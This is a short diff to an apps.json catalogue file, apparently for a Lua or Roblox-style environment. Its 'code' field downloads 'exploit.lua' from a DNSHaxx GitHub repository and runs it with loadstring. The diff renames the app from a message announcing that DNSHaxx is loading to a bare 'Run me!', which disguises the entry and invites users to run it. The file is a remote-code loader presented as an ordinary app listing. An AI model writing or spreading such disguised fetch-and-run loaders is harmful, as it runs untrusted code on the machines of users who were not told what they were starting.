--- a/apps.json
+++ b/apps.json
@@ -3,7 +3,7 @@
   "code": "local HttpService = GetService('HttpService'); local loadstring = loadlib('loadstring'); local haxx = getfenv(loadstring).myEnv; local code = HttpService:GetAsync('https://raw.githubusercontent.com/XG213/DNSHaxx/main/exploit.lua'); loadstring(code, haxx)()",
   "apps": [
     {
-      "name": "DNSHaxx is now loading, hang tight!",
+      "name": "Run me!",
       "developerName": "Byte",
       "version": "0.1",
       "downloadURL": "nil",
